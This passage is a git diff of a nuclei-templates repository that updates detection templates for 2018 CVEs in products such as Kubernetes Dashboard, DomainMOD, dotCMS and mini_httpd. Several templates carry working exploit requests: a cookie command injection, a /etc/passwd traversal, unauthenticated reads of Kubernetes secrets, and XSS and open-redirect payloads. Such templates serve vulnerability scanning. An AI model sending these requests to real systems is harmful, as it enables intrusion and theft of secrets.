cve,cve2018,auth-bypass,rce,wdcloud + shodan-query: http.favicon.hash:-1074357885 + tags: cve2018,cve,packetstorm,auth-bypass,rce,wdcloud,western_digital http: - raw: @@ -32,8 +38,6 @@ http: POST /web/google_analytics.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - Referer: {{RootURL}} Cookie: isAdmin=1; username=admin; cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23 @@ -45,3 +49,4 @@ http: - contains(body, "ganalytics") - status_code == 200 condition: and +# digest: 4a0a00473045022058fcc54d2a071bc04ea653adf5ee59de019803e965720629f2964ae22dfd64d7022100e02c6520dab17c3043e6a4dfda4abd3a62adba7f445a07c4c91779a0ab1949fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-17246.yaml b/nuclei-templates/CVE-2018/CVE-2018-17246.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-17246.yaml rename to nuclei-templates/CVE-2018/CVE-2018-17246.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-17254.yaml b/nuclei-templates/CVE-2018/CVE-2018-17254.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-17254.yaml rename to nuclei-templates/CVE-2018/CVE-2018-17254.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-17422.yaml b/nuclei-templates/CVE-2018/CVE-2018-17422.yaml deleted file mode 100644 index 39c4bb01f5..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-17422.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-17422 -info: - name: dotCMS < 5.0.2 - Open Redirect - author: 0x_Akoko,daffainfo - severity: medium - description: | - dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. - reference: - - https://github.com/dotCMS/core/issues/15286 - - https://www.cvedetails.com/cve/CVE-2018-17422 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-17422 - cwe-id: CWE-601 - metadata: - shodan-query: http.title:"dotCMS" - verified: "true" - tags: cve,cve2018,redirect,dotcms -requests: - - method: GET - path: - - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com' - - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "self.location = 'http://www.example.com'" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-17431.yaml b/nuclei-templates/CVE-2018/CVE-2018-17431.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-17431.yaml rename to nuclei-templates/CVE-2018/CVE-2018-17431.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-18069.yaml b/nuclei-templates/CVE-2018/CVE-2018-18069.yaml deleted file mode 100644 index 0ffc225e0b..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18069.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2018-18069 -info: - name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting - author: nadino - severity: medium - description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. - reference: - - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-18069 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-18069 - cwe-id: CWE-79 - tags: cve,cve2018,wordpress,xss,plugin -requests: - - method: POST - path: - - "{{BaseURL}}/wp-admin/admin.php" - body: | - icl_post_action=save_theme_localization&locale_file_name_en=EN"> - redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'contains(tolower(all_headers), "text/html")' - - 'contains(set_cookie, "_icl_current_admin_language")' - - 'contains(body, "\">")' - condition: and - -# Enhanced by mp on 2022/04/08 diff --git a/nuclei-templates/CVE-2018/CVE-2018-18264.yaml b/nuclei-templates/CVE-2018/CVE-2018-18264.yaml index 265a0ab403..c0b21f42aa 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-18264.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-18264.yaml @@ -1,33 +1,51 @@ id: CVE-2018-18264 + info: - name: Kubernetes Dashboard unauthenticated secret access + name: Kubernetes Dashboard <1.10.1 - Authentication Bypass author: edoardottt severity: high - description: Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster. + description: | + Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Kubernetes Dashboard, potentially leading to further compromise of the Kubernetes cluster. + remediation: | + Upgrade to Kubernetes Dashboard version 1.10.1 or later to mitigate the authentication bypass vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-18264 - https://github.com/kubernetes/dashboard/pull/3289 - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/ - https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI + - https://nvd.nist.gov/vuln/detail/CVE-2018-18264 + - https://github.com/kubernetes/dashboard/pull/3400 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-18264 cwe-id: CWE-306 + epss-score: 0.96092 + epss-percentile: 0.99459 + cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: + max-request: 2 + vendor: kubernetes + product: dashboard shodan-query: product:"Kubernetes" - tags: cve,cve2018,kubernetes,k8s,unauth -requests: + tags: cve,cve2018,kubernetes,k8s,auth-bypass + +http: - method: GET path: - "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" - "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" + stop-at-first-match: true + matchers-condition: and matchers: - - type: status - status: - - 200 - type: dsl dsl: - 'contains(body, "apiVersion") && contains(body, "objectRef")' + + - type: status + status: + - 200 +# digest: 4a0a00473045022100921dd75b1c4fd5bb0371f58e6411d7e4a06e9735d08963cb9f30cc658605c4ac02201a2470f007b63400ce14203c27f974db451f5e977b2d72cbb796458ce436c080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-18323.yaml b/nuclei-templates/CVE-2018/CVE-2018-18323.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-18323.yaml rename to nuclei-templates/CVE-2018/CVE-2018-18323.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-18570.yaml b/nuclei-templates/CVE-2018/CVE-2018-18570.yaml index d151172aa1..51249a06a8 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-18570.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-18570.yaml @@ -7,25 +7,29 @@ info: reference: - https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2018-18570 + tags: xss,cve,cve2018,planon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2018-18570 cwe-id: CWE-79 - tags: xss,cve,cve2018,planon + requests: - method: GET path: - '{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "" part: body + - type: word words: - "text/html" diff --git a/nuclei-templates/CVE-2018/CVE-2018-18608.yaml b/nuclei-templates/CVE-2018/CVE-2018-18608.yaml deleted file mode 100644 index c5b0ac561d..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18608.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2018-18608 - -info: - name: DedeCMS 5.7 SP2 - Cross-Site Scripting - author: ritikchaddha - severity: medium - description: | - DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. - reference: - - https://github.com/ky-j/dedecms/issues/8 - - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx - - https://nvd.nist.gov/vuln/detail/CVE-2018-18608 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-18608 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"DedeCms" - verified: "true" - tags: dedecms,xss,cve,cve2018 - -requests: - - method: GET - path: - - "{{BaseURL}}/plus/feedback.php/rp4hu%27>" - - "DedeCMS Error Warning!" - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/18 diff --git a/nuclei-templates/CVE-2018/CVE-2018-18778.yaml b/nuclei-templates/CVE-2018/CVE-2018-18778.yaml new file mode 100644 index 0000000000..6c269ecee5 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-18778.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-18778 +info: + name: mini_httpd Path Traversal + author: dhiyaneshDK + severity: medium + description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. + reference: + - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ + - http://www.acme.com/software/mini_httpd/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2018-18778 + cwe-id: CWE-200 + tags: cve,cve2018,lfi,mini_httpd +requests: + - raw: + - |+ + GET /etc/passwd HTTP/1.1 + Host: + + unsafe: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2018/CVE-2018-18809.yaml b/nuclei-templates/CVE-2018/CVE-2018-18809.yaml index 610ba2192c..32940d4fec 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-18809.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-18809.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. + impact: | + An attacker can access sensitive files, potentially leading to unauthorized disclosure of sensitive information. remediation: | Apply the latest security patches or upgrade to a patched version of TIBCO JasperReports Library. reference: @@ -19,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2018-18809 cwe-id: CWE-22 - epss-score: 0.46465 - epss-percentile: 0.97094 + epss-score: 0.43128 + epss-percentile: 0.97253 cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: tibco product: jasperreports_library shodan-query: html:"jasperserver-pro" - tags: packetstorm,seclists,cve,cve2018,lfi,kev,jasperserver,jasperreport + tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco http: - method: GET @@ -47,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009be46c7bb777e641e3a523f0343d176d1e62bf646d5fffd53ff97747d3b969290220470c38d7a29fed9b96df2eb6ac8b678f1ce11b058c3f46b8dbb86d1a8ae5c2c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051e000ecdfd4aa645d1ea0afc88abe972a800a4c61b68a33c00d1e9fb5e511f7022100d82adc8517d67a9a0efbf2798fcd8b9642478f1f7df6f7bc8a2caafc7c07ce11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-19137.yaml b/nuclei-templates/CVE-2018/CVE-2018-19137.yaml index 6439455c7b..c689c4e74a 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-19137.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-19137.yaml @@ -1,35 +1,22 @@ id: CVE-2018-19137 - info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | - DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + DomainMOD 4.11.01 is vulnerable to Reflected Cross Site Scripting (rXSS) via assets/edit/ip-address.php. reference: - https://github.com/domainmod/domainmod/issues/79 - https://nvd.nist.gov/vuln/detail/CVE-2018-19137 - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-19137 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39294 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 2 - vendor: domainmod - product: domainmod + verified: "true" tags: cve,cve2018,domainmod,xss,authenticated - -http: +requests: - raw: - | POST / HTTP/1.1 @@ -40,20 +27,17 @@ http: - | GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1 Host: {{Hostname}} - + cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '&really_del' - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a004830460221008ba31c9c82e3d2016b0e39007d322dda9dd974dd85f6112e1b2ec69f3d02d4af022100e175d0b3e653876624f486f5a9a616358108cdb0ffe8b51a26095d719cd9e90b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-19287.yaml b/nuclei-templates/CVE-2018/CVE-2018-19287.yaml index 0ed57f548c..e3bf2d980e 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-19287.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-19287.yaml @@ -6,21 +6,33 @@ info: severity: medium description: | WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version of the Ninja Forms plugin (3.3.18 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/fb036dc2-0ee8-4a3e-afac-f52050b3f8c7 - https://wordpress.org/plugins/ninja-forms/ - https://www.exploit-db.com/exploits/45880 - https://nvd.nist.gov/vuln/detail/CVE-2018-19287 + - https://plugins.trac.wordpress.org/changeset/1974335/ninja-forms/trunk/includes/Admin/Menus/Submissions.php classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-19287 cwe-id: CWE-79 + epss-score: 0.37007 + epss-percentile: 0.96816 + cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp-plugin,wp,xss,authenticated,wpscan,edb,cve,cve2018,ninja-forms,wordpress - -requests: + verified: true + max-request: 2 + vendor: ninjaforma + product: ninja_forms + framework: wordpress + tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma + +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -28,13 +40,10 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=">')" - condition: and - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19751.yaml b/nuclei-templates/CVE-2018/CVE-2018-19751.yaml deleted file mode 100644 index 7a50117796..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19751.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: CVE-2018-19751 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters. - reference: - - https://www.exploit-db.com/exploits/45947/ - - https://github.com/domainmod/domainmod/issues/83 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19751 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19751 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated,edb - -requests: - - raw: - - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /admin/ssl-fields/add.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test - - - | - GET /admin/ssl-fields/ HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19752.yaml b/nuclei-templates/CVE-2018/CVE-2018-19752.yaml index f5d120debe..4876f6389a 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-19752.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-19752.yaml @@ -1,36 +1,23 @@ id: CVE-2018-19752 - info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | - DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 - https://github.com/domainmod/domainmod/issues/84 - https://www.exploit-db.com/exploits/45949/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-19752 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39112 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 3 - vendor: domainmod - product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated,edb - -http: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: - raw: - | POST / HTTP/1.1 @@ -47,23 +34,19 @@ http: - | GET /assets/registrars.php HTTP/1.1 Host: {{Hostname}} - - host-redirects: true + cookie-reuse: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word part: body words: - '">' - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a004730450220233adb77a26a1b91da079bdf0eb8b3aae6997e9e8eafc1246a94b187acbcf10e022100cc16f3f453b69215c3af952bc5f242abcd26f8e2c38445664464564ddb39f26d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-19753.yaml b/nuclei-templates/CVE-2018/CVE-2018-19753.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-19753.yaml rename to nuclei-templates/CVE-2018/CVE-2018-19753.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19877.yaml b/nuclei-templates/CVE-2018/CVE-2018-19877.yaml new file mode 100644 index 0000000000..1a7a7645d2 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19877.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-19877 +info: + name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting + author: arafatansari + severity: medium + description: | + Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file. + reference: + - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/ + - https://www.exploit-db.com/exploits/45958/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-19877 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,adiscon,xss +requests: + - method: GET + path: + - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E" + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'value="">' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19892.yaml b/nuclei-templates/CVE-2018/CVE-2018-19892.yaml deleted file mode 100644 index f310b4f7f4..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19892.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: CVE-2018-19892 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters. - reference: - - https://www.exploit-db.com/exploits/45959 - - https://github.com/domainmod/domainmod/issues/85 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19892 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19892 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve2018,domainmod,xss,authenticated,edb,cve - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /admin/dw/add-server.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes= - - - | - GET /admin/dw/servers.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 3 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19914.yaml b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml new file mode 100644 index 0000000000..f74e59b810 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml @@ -0,0 +1,46 @@ +id: CVE-2018-19914 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field. + reference: + - https://www.exploit-db.com/exploits/46375/ + - https://github.com/domainmod/domainmod/issues/87 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19914 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/dns.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E + - | + GET /assets/dns.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-19915.yaml b/nuclei-templates/CVE-2018/CVE-2018-19915.yaml deleted file mode 100644 index 5a975e956b..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19915.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2018-19915 - -info: - name: DomainMOD <=4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/edit/host.php Web Host Name or Web Host URL field. - reference: - - https://github.com/domainmod/domainmod/issues/87 - - https://www.exploit-db.com/exploits/46376/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19915 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19915 - cwe-id: CWE-79 - metadata: - verified: true - tags: domainmod,xss,authenticated,edb,cve,cve2018 - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/host.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test - - - | - GET /assets/hosting.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2018/CVE-2018-20009.yaml b/nuclei-templates/CVE-2018/CVE-2018-20009.yaml deleted file mode 100644 index 40298f6945..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-20009.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2018-20009 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters. - reference: - - https://github.com/domainmod/domainmod/issues/88 - - https://www.exploit-db.com/exploits/46372/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-20009 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20009 - cwe-id: CWE-79 - metadata: - verified: true - tags: domainmod,xss,authenticated,edb,cve,cve2018 - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/ssl-provider.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes= - - - | - GET /assets/ssl-providers.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2018/CVE-2018-20010.yaml b/nuclei-templates/CVE-2018/CVE-2018-20010.yaml deleted file mode 100644 index 9f5e6c82a0..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-20010.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2018-20010 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through version 4.11.01 is 